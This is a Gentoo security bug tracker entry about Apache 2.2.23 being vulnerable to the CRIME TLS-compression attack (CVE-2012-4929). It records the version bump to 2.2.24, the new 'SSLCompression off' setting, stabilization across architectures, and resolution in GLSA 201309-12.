Summary: | <www-servers/apache-2.2.24: unable to disable TLS compression, vulnerable to CRIME attack (CVE-2012-4929) | ||
---|---|---|---|
Product: | Gentoo Security | Reporter: | Hanno Böck <hanno> |
Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
Status: | RESOLVED FIXED | ||
Severity: | minor | CC: | josh, mail, patrick, proxy-maint, pva |
Priority: | Normal | ||
Version: | unspecified | ||
Hardware: | All | ||
OS: | Linux | ||
URL: | http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcompression | ||
Whiteboard: | B4 [glsa] | ||
Package list: | Runtime testing required: | --- | |
Bug Depends on: | |||
Bug Blocks: | 459264 |
Description
Hanno Böck
2012-10-17 08:40:37 UTC
CVE-2012-4929 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4929): The TLS protocol 1.2 and earlier, as used in Mozilla Firefox, Google Chrome, Qt, and other products, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a "CRIME" attack. 2.2.24 still not released yet. Would be bad if there would be a 2.2.23-r1 with the same ebuild as 2.2.23 plus the patch in Comment #1 ? At last someone can release Apache 2.2.23-r1 with this patch or Linux Gentoo completly die and everyone ignore security? Nah. All we need is a version bump, 2.2.24 got released yesterday. Cool but this is good to wait for new version? - all other Linux Distro create own patch and release new version... And one more - new apache release 2013-02-25 and still no in portage... +*apache-tools-2.2.24 (28 Feb 2013) + + 28 Feb 2013; Tony Vroon <chainsaw@gentoo.org> +apache-tools-2.2.24.ebuild: + Version bump as required for =www-servers/apache-2.2.24; for security bug + #438680 filed by Hanno Boeck. +*apache-2.2.24 (28 Feb 2013) + + 28 Feb 2013; Tony Vroon <chainsaw@gentoo.org> +apache-2.2.24.ebuild: + Upstream security fix adds "SSLCompression" parameter to disable flawed + compression support and thus protect against the CRIME attack. For security + bug #438680 filed by Hanno Boeck. Arches, please test & mark stable: =app-admin/apache-tools-2.2.24 =www-servers/apache-2.2.24 Target keywords: "alpha amd64 arm hppa ia64 ppc ppc64 s390 sh sparc x86" Users, you need to set "SSLCompression off" in any VirtualHost that declares "SSLEngine on" in order to fully secure your installation. A tester is available here: https://www.ssllabs.com/ssltest/ amd64 stable x86 stable ia64 stable arm stable alpha stable s390 stable ppc64 stable ppc stable hppa stable sparc stable sh stable GLSA vote: yes. YES too, added to existing request. This issue was resolved and addressed in GLSA 201309-12 at http://security.gentoo.org/glsa/glsa-201309-12.xml by GLSA coordinator Sean Amoss (ackle). |